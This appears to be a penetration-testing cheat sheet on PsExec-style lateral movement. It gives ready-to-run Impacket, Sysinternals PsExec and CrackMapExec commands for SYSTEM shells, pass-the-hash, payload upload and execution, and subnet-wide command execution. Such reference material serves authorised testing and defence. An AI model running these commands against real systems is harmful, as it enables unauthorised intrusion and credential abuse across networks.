> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# PsExec

> PsExec lateral movement: Impacket, Sysinternals, and CrackMapExec for remote code execution.

## Impacket — psexec

```bash theme={"dark"}
impacket-psexec DOMAIN/user:password@TARGET
impacket-psexec DOMAIN/user@TARGET -hashes :NTLM_HASH
impacket-psexec DOMAIN/user:password@TARGET -codec 437    # Fix encoding
```

Returns SYSTEM shell.

***

## Impacket — smbexec

```bash theme={"dark"}
impacket-smbexec DOMAIN/user:password@TARGET
impacket-smbexec DOMAIN/user@TARGET -hashes :NTLM_HASH
```

No binary upload — uses service creation.

***

## Sysinternals PsExec

```cmd theme={"dark"}
PsExec.exe \\TARGET -u DOMAIN\user -p password cmd.exe
PsExec.exe \\TARGET -u DOMAIN\user -p password -s cmd.exe    # SYSTEM
PsExec.exe \\TARGET -u DOMAIN\user -p password -c payload.exe # Upload & exec
```

### Accept EULA

```cmd theme={"dark"}
PsExec.exe -accepteula \\TARGET cmd.exe
```

***

## CrackMapExec

```bash theme={"dark"}
crackmapexec smb TARGET -u user -p password -x "whoami"         # CMD
crackmapexec smb TARGET -u user -p password -X "Get-Process"    # PowerShell
crackmapexec smb TARGET -u user -H NTLM_HASH -x "whoami"
```

### Multiple Targets

```bash theme={"dark"}
crackmapexec smb 10.10.10.0/24 -u admin -p password -x "whoami"
crackmapexec smb targets.txt -u admin -H HASH -x "whoami"
```

***

## Requirements

* Admin rights on target
* SMB (445) accessible
* ADMIN$ or C$ share writable (psexec)
* File and Printer Sharing enabled

***

## Quick Reference

| Tool             | Command                                            |
| ---------------- | -------------------------------------------------- |
| Impacket psexec  | `impacket-psexec DOMAIN/user:pass@TARGET`          |
| Impacket smbexec | `impacket-smbexec DOMAIN/user:pass@TARGET`         |
| Sysinternals     | `PsExec.exe \\TARGET -u user -p pass cmd`          |
| CME              | `crackmapexec smb TARGET -u user -p pass -x "cmd"` |
